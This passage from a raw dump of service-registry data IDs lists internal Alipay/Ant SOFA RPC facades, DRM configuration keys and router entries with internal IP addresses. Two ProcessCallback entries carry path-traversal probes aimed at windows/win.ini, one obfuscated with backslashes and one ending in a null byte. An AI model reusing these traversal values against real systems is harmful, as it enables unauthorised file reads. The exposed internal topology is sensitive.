ID#@#SOFA","Alipay.Arch:name=com.alipay.xts.ldc.tradeapcore.changeMode,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acctrans.facade.api.financingtrans.FintransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.162.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.224.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bizfund.common.service.facade.allocation.EntrustWithdrawAgreementFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msfluxconf:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.dumpLogTables,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_R_CUSTOMER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.serverless.test.facade.RpcTestService:1.0:arkbaseserverless-restartde-aigd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.irisknet.biz.service.bc.CheckComplianceRetryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-insscreen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsmng.common.service.facade.modelinfo.FpdSyncFacade:1.0:bkFpdSyncFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.limitConfigs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.execute.ExecutionNotifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.zcache.tbase.bankcardTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.warehouse.vdps.facade.VdpsCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.hbase.impl.HBaseClientTimeoutConfigResource.useZdal,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.miniprod.common.service.facade.api.miniappservice.MiniAppServiceQueryToBFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.248.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileha.facade.antha.AnthaChangeRecordCountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.identity.GroupServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.merchant.MerchantGzoneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.185.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finorm.biz.direct.sample.BizEventDirectSampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.lottery.EinvLotteryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imtmsvcprod.common.service.facade.Fueling.ElectricFenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:funcmaster@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.equityproductcore.common.service.facade.ItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_169.254.194.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.fuse.FuseWarningSendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepcoin.core.service.secumachine.report.SecuMachineReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omgpromotion.api.AntGrowthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.fop.facade.FopShopSubscribeActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:resmng-allocateRulePMCCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_RQ_Notify_3#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:settlementprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.admediamgr.common.service.facade.service.MediaReportServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.membercenterTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobiletms.plugin.common.service.facade.api.PluginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.api.ApiSidecarOdpLimitFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.drmdemos:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:assetinsight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.cifneardata.ReportQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.inner.service.process.AliyunProcessInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.service.facade.api.PrizeSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.outbound.facade.InstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iWFBizProdCommonCacheTBaseCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.ptcore.common.service.facade.api.controller.ControllerModelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.standalone.test.demo.SampleService:1.0:uniqueId@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatacontextTBaseCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mychain.gov.common.facade.api.DataOwnerAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zcbsalescenter.common.service.facade.redeem.UserRedeemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexchange.service.facade.api.ExchangeRateCurrencyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.lendpofprod.lendpofprod_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:appstoreProcessAuditCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antopo.common.service.facade.biz.abilitycenter.InnerProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuinfos.common.v3.service.facade.api.autopush.AutoPushRecFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:trafficintelbiz@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:pcloanrepay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.116.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inscvprod.common.service.facade.cicada.InsPlayBackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.myservices.api.InsMyServicesFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.biz.shared.gray.MsFluxConfGrayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.securitycap.core.service.threshold.drm.ProfilerThresholdResource.logLength,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.baymax.maintainess.drm.scheduleParameter.app_finfocore.taskSliceRunningTimeoutSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:industrygw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingcore.common.service.facade.campaign.InsMktCampaignConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.common.service.facade.FundContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.aliminiabilityprod.facade.api.BundleJsApiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:certifymng_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.common.AssetImageMergeTemplateParamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_CRM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.166.128.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbcateringprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@meshyopt#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fundselling.common.service.tradequery.facade.FundTradeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.imdopcore.facade.ShopService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mcomment.common.service.facade.common.McommentCommonQuery4CZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:igfas@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestprod.common.service.facade.api.CaseSceneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.FixedData2SyncTable4CheckDrmImpl.whiteTaskIdListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promomng.core.model.script.repository.AntScriptRelationRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinsight.service.api.rptcfg.ReportTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isdsp.common.service.facade.DsScriptServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fincommonbff:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.common.api.receipt.ReceivePayAckWithResultService:1.0:payrouter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.96.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchstm.common.service.facade.purchases.facade.AssetPurchasesReqOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsecu.common.service.facade.api.portfolio.AdminPortfolioFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifcommon.uniquery.facade.UniQueryCacheSyncService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.OtherRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudprod.facade.riskcheck.ChangeReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.useragreement.facade.UserAgreementQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_campSkipGrayApproveSuccessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:fxRateOperateTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaexprod.common.mobilerpc.facade.service.ClassRateQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.mng.facade.ImportExportRouterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcreditmerchant_CZONE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bketencip_busiopProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP-C-securitycenter#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.appstore.common.service.facade.admin.AdminAppFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pricecenter.common.service.facade.api.PriceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zpublishuiweb:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchishub.common.service.facade.api.assetdecision.mng.AssetDecisionMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.standard.facade.api.ParmClientRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.L2DealTransactionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.cache.DrmMappingRuleCacheRefresh.outCardConfigCacheRefresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundmng.biz.redeem.domainservice.FundRedeemServiceV1:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.biz.shared.match.repository.impl.MatchAppointmentDeltaHourDataStatModelRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.detect.DetectItemCheck:1.0:baseinfoCompleteDetectItemCheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:pcTeamShopListDownload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.venue.VenueStrategyManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:minitoptrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsroalipay.facade.riskscape.BatchInstanceOpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.integrationprod.common.service.facade.MigrationAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:apscmngShopAutomaticMigrate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antiep.common.service.facade.AntiepP2PBizFacade:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.205.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bkpromofront.facade.discountpoint.DiscountProfitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.shangshu.anticrawler.service.facade.dynamicfont.service.DynamicFontService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.WorkspaceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.core.service.merchantactivity.MerchantActivityService:1.0:merchantActivityServiceOnlyTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.87.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.deilveryprod.common.service.integration.dmp.DmpClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.alinode:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.couponcore.common.service.facade.CouponQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.o2o.facade.PrincipalConstraintQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexpmprod.facade.api.ShopifyMerchantInfoServcie:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finfoprodSceneProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:EC_IRECON2_SETTLED_ACCOUNTING_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_T_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.mif.common.service.facade.brand.BrandFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.landlordgame.facade.api.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.imtmsvcprod.common.service.facade.edu.SchoolInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mwealthprod.common.service.facade.YouthGroundNotifyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.ou.OuManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.SnapshotFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBackForLdc:1.0:poscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pricecenter-priceAudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.integration.mobilerelation.AlipayRelationQueryFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepromo.common.service.facade.coupon.CouponCampTemplateManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.itscenter.common.service.facade.UmidDeviceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.vostroflux.service.spi.VostroQueryService:1.0:bkebppcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.cache.facade.SwitchCoreCacheQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:inshealthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.84.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcloanmarket.common.service.facade.deliver.CommonContentRecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingprod.common.service.client.service.InsMktProdExterfaceInvokeService:1.0:inshealthcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.60.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.erecon.common.service.facade.fund.api.item.ErcInstItemEditService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.antg.facade.accesstoken.AgAntIdRelManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone_dest.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insapportion@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.ps.rpc.facade.dingtalk.DingTalkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:agdsccalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:vouchercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PayChannelDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.FundBillQueryFacade:1.0:tradequeryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ADMEDIAMGR#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smartscene.common.facade.CloudbusCityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.PgpKeyManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.debittrans.service.facade.zmtrans.api.ZmtransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insuserinsight.facade.usergrowth.GrowthMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.forum.api.ForumInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.metadata.endpoint.facade.ReportServiceMetadataFacade:1.0@rest#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.89.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.charge:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilepep.common.manage.facade.CardManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.64.250#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gffund.common.service.facade.api.StandardVoucherQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.drmdemos:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.tabInfoUrlUpdate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.prodcore.service.api.product.ProductRuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.charge.BillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.HbaseTableServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.68.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.apm.facade.indicator.IndicatorQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.service.facade.FundContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.AppPlatformConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.recalCheckOrderSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insttune.common.service.facade.backend.CaseService:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:lifemngKeyUpdateCallbackDynamicInvoke@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.discount.common.service.facade.management.CampBizLimitManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue21#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.bkgwlite.common.service.facade.api.TransSendService:1.0:bkgwlite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:../../../../../../../../../../windows/win.ini\u0000.@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon.common.service.query.fund.api.QueryInstReconLogService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.CheckFileManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.bizcondition.BizConditionOperateService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.trade.FintradeCalculateUtilFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.GiftService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkebppcenter.common.service.mobile.api.RepaymentMobileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.fundscheme.FundSchemeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.mosng.endpoint.facade.BotRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@securitymegadatacalc#@#DEFAULT_INSTANCE_ID#